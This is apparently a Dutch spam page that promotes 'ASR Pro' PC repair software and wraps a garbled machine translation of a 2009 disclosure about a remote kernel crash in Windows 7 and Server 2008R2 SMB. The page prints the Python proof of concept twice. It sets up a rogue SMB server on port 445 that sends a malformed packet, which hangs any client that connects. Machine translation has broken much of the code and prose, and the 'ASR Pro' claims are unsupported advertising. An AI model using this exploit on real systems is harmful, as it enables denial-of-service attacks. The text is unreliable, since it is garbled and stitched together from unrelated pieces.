Opgelost: Suggesties Voor Het Oplossen Van Problemen Met De Windows 7 / Server 2008r2 Kernelcrash Op Afstand.

Table of Contents

Goedgekeurd

1. Download ASR Pro

2. Open het programma en selecteer "Scan uw computer"

3. Klik op "Repareren" om het reparatieproces te starten

De software om uw pc te repareren is slechts een klik verwijderd - download hem nu.

Als Windows five / Server 2008r2 Remote Kernel op uw computer crasht, hopen we allemaal dat u met deze gebruikershandleiding het probleem kunt oplossen. G.Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: Het dringt een storing binnen om bewerkingen uit te voeren in de Microsoft Windows SMB-client op Windows 7 plus Windows Server 2007 R2. Het faalt meestal in de stille kernel. Het Metasploit Framework bevat dat je eenvoudig een module kunt gebruiken om mijn kwetsbaarheid te misbruiken.

  #! / usr versus bin / python# win7-crash.Trigger py:# remote control kernel crash op hostserver Win7 en 2008R2 (oneindige lus)# KeAccumulateTicks () crasht vanwege NT_ASSERT () - DbgRaiseAssertionFailure () veroorzaakt door krachtige# Eindeloze cyclus.# GEEN BSOD, U MOET DE CONNECTOR LOSKOPPELEN.# Om deze tool snel te bellen; in volgorde:  this_script_ip_addr  BLAH, crash moeiteloos# Auteur: Laurent Gaffi¯ ¿ ½Socketserver importerenPakket = (" x00  x00  x00  x9a" nummerruimte ---> moet 9e zijn, niet langer 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62 x60  xca  x01 "" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x 10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")SMB2-klasse (SocketServer.BaseRequestHandler):  Def-Handle (zelf):        print "Wie:", self.client_address        Gebruik "DANK SDL"       De invoer die betekent dat self.request.recv (1024)        zelf.verzoek.verzenden (pakket)        zelf.verzoek.sluiten ()launch = SocketServer.TCPServer (('', 445), SMB2) # luister op alle interfaces van de stad 445launch.serv_forever ()

Deze fout is belangrijk bewijs dat SDL FAIL
Het doel van die fout is een oneindige lus met smb1,2, pre-authenticatie, alleen geen inloggegevens verplicht …
Kan worden gelanceerd op lokale leverancier via (IE *)
De fout is ongetwijfeld zo eenvoudig dat hij vaak jaren geleden had moeten worden ontdekt door een specifieke SDL als de SDL al bestond:

netbios_header impliceert struct.pack (“> i”, len (”. meld je aan bij (SMB_packet)) + SMB_packet
(De netbios h2-tags geven de lengte aan waarmee het nieuwe smb1,2-pakket is verbonden.)

Als uw netbios_header-nummer 4 bytes veel minder of meer is dan SMB_packet, wordt de positie gewoon geschonden!
WELK SOORT ?? Houd je me voor de gek, waar zou mijn SDL kunnen zijn?!?

windows 7 - server 2008r2 remote kernelcrash

“Het gemakkelijkste besturingssysteem op het licht. е “;
Dat uw juiste firewall vaak is geconfigureerd moet via IE worden verwijderd, zelfs met nbns broadcast-systeem (geen gebruikersinteractie)

================================================
– Releasedatum: 11 november 2009
– Ontdekt door: Laurent Gaffier
– Ernst: keuze / hoge
==============================================

windows 7/server 2008r2 kernelcrash op extern apparaat

NS. BEVESTIGING VAN HET CONCEPT
————————–
# win7-crash.py:
# De beste echte kernelcrash op afstand uitvoeren onder Win7 en daarom Server 2008R2 (oneindige lus)
# KeAccumulateTicks () crashte omdat je NT_ASSERT () / DbgRaiseAssertionFailure () gevormd door # sterke oneindige lus kunt.
# GEEN BSOD, JE HEBT EEN KURK.
# Om het snel te noemen; while order: this_script_ip_addr BLAH, verlaag het tempo van onmiddellijk
# Geplaatst door Laurent Gaffier
#

Pakket = (getal ” x00 x00 x00 x9a” —> 9e lengte zou eigenlijk over het algemeen 9a moeten zijn ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

V. COMMERCILE IMPACT
————————–
Een aanvaller kan op afstand alle Windows 2008R2-apparatuur uitschakelen 7 /
op de lokale meet of via IE

Vii. Patchproduct
————————–
is hier op zijn beurt niet voor beschikbaar, uw ISP maakt het niet uit.
Sluit de SMB-functie en poorten totdat er een audit van kracht is.

X. GESCHIEDENIS VAN WIJZIGINGEN
————————–
8 november 2009: MSRC nam contact op met
8 november 2009: MSRC ontdekt kwetsbaarheid
11 nov 2009: MRSC moet me proberen te overtuigen, want high is een IPv6-bug van zoveel leveranciers die niet in beveiligingsbulletins zou moeten verschijnen.
11 november 2009: Deze waardevolle bug is vrijgegeven.

XI. OPMERKINGEN
————————–
De juridische informatie in deze kennisgeving is zo lang als “as is”
zonder verklaringen of garanties, met inbegrip van opportuniteit of anderszins.
Ik begrijp geen schade veroorzaakt door de persoon of
Misbruik van deze informatie.

Volledige openbaarmakingMailinglijst Archief

Externe kernel neemt af Windows 7 Server 2008R2Van: laurent gaffie
Datum: gmail woensdag 11 november 2009 05:58:44 , 05:00
==============================================- DATUM van uitgifte: 11 november 2009- Zojuist ontdekt: Laurent Gaffier- Ernst: gemiddeld / hoog.================================================I. KWETSBAARHEID————————–Kernelvergrendeling op afstand Windows 1, * Server 2008R2II. CONTEXT————————–# FAIL, # FAIL, # FAILSDL FAIL, “Het meest veilige besturingssysteem ooit” -> Externe kernel in minuten.# FAIL, # FAIL, # FAILIII. OMSCHRIJVING————————–Zie: http://g-laurent.blogspot.com/ voor meer informatie en talloze details.# Opmerking: deze bug is vooral bekend als Windows 7 / 2008R2.NS. CONCEPTUEEL BEWIJS————————–# win7-crash.py:# Nog een controller-kernelcrash uitvoeren onder Win7 naast server 2008R2 (oneindige lus)# KeAccumulateTicks () crasht vanwege NT_ASSERT () – DbgRaiseAssertionFailure ()summoningano eindeloze lus.# GEEN BSOD, JE ONTKOPPEL DE CONNECTOR.# Voor een snelle start vanaf het doel: this_script_ip_addr BLAH, onmiddellijkBotsing#Auteur: Laurent Gaffier#Socketserver importerenPakket = ” x00 x00 x00 x9a” # —> een van de meest 9e, niet 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”SMB2-klasse (SocketServer.BaseRequestHandler): def beheren (auto): “Wie:” Afbeelding, zelf.client_address Het jouw pad impliceert self.request.recv (1024) zelf.verzoek.verzenden (pakket) zelf.verzoek.sluiten ()Start betekent SocketServer.TCPServer ((”, 445), SMB2) # luisteren op zowat alle poorten445voer interface.serv_forever uit ()#SDL FAILV. ZAKEN Aanval van de agressor————————–en kan op afstand elke Windows 7 / Server 2008R2 inklappen.VI… GEBOEKTE SYSTEMEN————————–Windows 7, Windows 2008R2VII webserver. OPLOSSING————————–Er is niet op elk moment een patch, daar trekt de verkoper zich niets van aan.Sluit het SMB-kledingstuk en de poorten totdat er een echte boekhouding wordt uitgevoerd.VIII. REFERENTIES————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Leningen————————–Deze kwetsbaarheid werd staande geïmplementeerd door Laurent Gaffier. ontdektLaurent.gaffieremove-this (at) gmail.comX. GESCHIEDENIS VAN HERZIENINGEN————————–8 november, het jaar dat net voorbij is: contact opgenomen met MSRC.9 november 2009: MSRC is eigenaar van een kwetsbaarheid.11 november 2009: MRSC probeert zichzelf ervan te overtuigen dat IPv6 van verschillende leveranciers één specifieke bug is.mogen niet in surveillancebulletins verschijnen.11 november 2009: Win Remote 7 Kernel Smash uitgebrachtXI. JURIDISCHE KENNISGEVING————————–De informatie in deze kennisgeving wordt geleverd “zoals ze is”.zonder garantiebepalingen of gebruiksaanbiedingen, of soms anderszins.Ik ben niet verantwoordelijk voor slijtage veroorzaakt door het oefenen met ormisbruik maken van deze informatie.XII Persoonlijke notities————————–Meer afgelegen FD @MS-kernels zullen op een later tijdstip terugkeren.

 ________________________________________________GeslachtMijn openbaarmaking van informatie - vertrouw nu correct.Handvest: http://lists.grok.org.uk/full-disclosure-charter.htmlZojuist gepost en gesponsord via het proces van Secunia Http: // secunia-.com/

Op datum Op Draad

Huidige stream:

Windows Server 2008R2 Krachtige externe kernelcrash door Laurent Gaffy (11 november)

Goedgekeurd

De ASR Pro-reparatietool is de oplossing voor een Windows-pc die traag werkt, registerproblemen heeft of is geïnfecteerd met malware. Deze krachtige en gebruiksvriendelijke tool kan uw pc snel diagnosticeren en repareren, waardoor de prestaties worden verbeterd, het geheugen wordt geoptimaliseerd en de beveiliging wordt verbeterd. Geen last meer van een trage computer - probeer ASR Pro vandaag nog!